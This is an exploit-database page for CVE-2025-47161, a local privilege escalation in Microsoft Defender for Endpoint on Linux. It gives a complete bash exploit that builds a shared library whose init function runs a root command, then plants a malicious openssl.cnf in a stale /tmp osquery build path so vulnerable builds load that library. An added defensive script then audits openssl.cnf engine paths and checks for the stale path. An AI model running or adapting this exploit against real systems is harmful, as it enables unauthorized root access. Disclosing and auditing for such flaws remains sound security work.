
Microsoft Defender for Endpoint (MDE) - Elevation of Privilege

Published: 08 Jul 2025 00:00:00. Reported by Rich Mirch. Type: exploitdb. Source: www.exploit-db.com. 281 views.

Microsoft Defender for Endpoint privilege escalation vulnerability affects multiple 2025 builds.

Related

Reporter | Title | Published | Views
Circl | CVE-2025-47161 | 15 May 2025 19:33 | –
CNNVD | Microsoft Defender for Endpoint Access Control Error Vulnerability | 15 May 2025 00:00 | –
CVE | CVE-2025-47161 | 15 May 2025 19:21 | –
Cvelist | CVE-2025-47161 Microsoft Defender for Endpoint Elevation of Privilege Vulnerability | 15 May 2025 19:21 | –
EUVD | EUVD-2025-15199 | 3 Oct 2025 20:07 | –
Kaspersky | KLA83714 PE vulnerability in Microsoft System Center | 15 May 2025 00:00 | –
Microsoft CVE | Microsoft Defender for Endpoint Elevation of Privilege Vulnerability | 15 May 2025 07:00 | –
NVD | CVE-2025-47161 | 15 May 2025 20:16 | –
OSV | CVE-2025-47161 | 15 May 2025 20:16 | –
Packet Storm | Microsoft Defender for Endpoint Privilege Escalation | 9 Jul 2025 00:00 | –

Exploit code
#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link: https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
#
# Vendor Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"

# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

void woot(){
    // for manual testing
    if(isatty(STDERR_FILENO)) {
        fprintf(stderr,"Woot!\n");
    }
    system("ps -ef > /woot.txt");
    sleep(3000000);
}

EOF

# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o

mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/

cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf <<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section

[engine_section]
woot = woot_section

[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF

echo "Checking every 15 seconds for /woot.txt"
while true
do
    if [[ -f /woot.txt ]]
    then
        echo "WOOT - /woot.txt exists"
    ls -ld /woot.txt
    exit
    fi
    sleep 15
done
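The exploit above works because the vulnerable builds load an openssl.cnf from a stale osquery build path under /tmp, and an OpenSSL config can name an arbitrary shared object as a dynamic engine. The following shell script is an added defensive audit, not part of the original exploit or of MDE: it extracts every engine "dynamic_path" from an openssl.cnf, flags any library that lives in a scratch directory, is not root-owned, or is group/world writable, and separately reports whether the stale build path from the exploit exists at all on the host. It assumes Linux with GNU coreutils (stat -c); the file names and the temp-dir fixtures used for testing are constructed.

```shell
#!/bin/sh
# Added defensive check (not the exploit author's code and not an MDE tool):
# audit openssl.cnf engine entries and look for the stale build path the
# exploit plants its config in. Assumes GNU coreutils (stat -c) on Linux.

# Path the exploit above writes its malicious openssl.cnf to (taken from the page).
MDE_STALE_CNF=/tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf

# Print every dynamic_path value in a config file, one per line.
# Accepts "dynamic_path = /x", "dynamic_path=/x" and trailing comments.
list_dynamic_paths() {
    sed -n 's/^[[:space:]]*dynamic_path[[:space:]]*=[[:space:]]*\([^[:space:]#]*\).*/\1/p' "$1"
}

# Return 0 if the engine library at $1 is acceptable: exists, is owned by
# root, is not group/world writable, and does not live in a scratch or home
# directory that unprivileged users can write to.
engine_path_is_trusted() {
    p=$1
    case "$p" in
        /tmp/*|/var/tmp/*|/dev/shm/*|/home/*) return 1 ;;
    esac
    [ -f "$p" ] || return 1
    set -- $(stat -c '%u %a' "$p")
    [ "$1" -eq 0 ] || return 1
    # %a gives octal mode digits, e.g. 644: last two digits are group and other.
    perms=$2
    g=$(( (perms / 10) % 10 ))
    o=$(( perms % 10 ))
    [ $(( g & 2 )) -eq 0 ] && [ $(( o & 2 )) -eq 0 ]
}

# Audit one openssl.cnf. Prints one line per engine and returns 1 if any
# engine library is untrusted, 0 if the file is clean or has no engines.
check_openssl_cnf() {
    cnf=$1
    bad=0
    for path in $(list_dynamic_paths "$cnf"); do
        if engine_path_is_trusted "$path"; then
            echo "ok        $cnf engine $path"
        else
            echo "UNTRUSTED $cnf loads engine from $path"
            bad=1
        fi
    done
    return $bad
}

# Return 1 if the stale osquery build path exists on this host. The exploit
# relies on vulnerable MDE builds reading an openssl.cnf from there, so its
# presence on a host that never built osquery is a finding in itself.
check_stale_build_path() {
    if [ -e "$MDE_STALE_CNF" ]; then
        echo "FOUND     $MDE_STALE_CNF (unexpected on a production host)"
        return 1
    fi
    return 0
}

# Usage: sh check-openssl-engines.sh /etc/ssl/openssl.cnf [more.cnf ...]
# With no arguments nothing runs at top level, so the functions can be sourced.
rc=0
for cnf in "$@"; do
    check_openssl_cnf "$cnf" || rc=1
done
if [ $# -gt 0 ]; then
    check_stale_build_path || rc=1
fi
[ $# -eq 0 ] || exit $rc
```

Run it against every openssl.cnf the host's OpenSSL installations read (the system default plus any bundled with an agent); a non-zero exit means a config would load an engine library that an unprivileged user could have planted or replaced.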


Current as of 08 Jul 2025 00:00
Vulners AI Score: 6.5 (Medium risk)
CVSS 3.1: 7.8
EPSS: 0.04361
Views: 281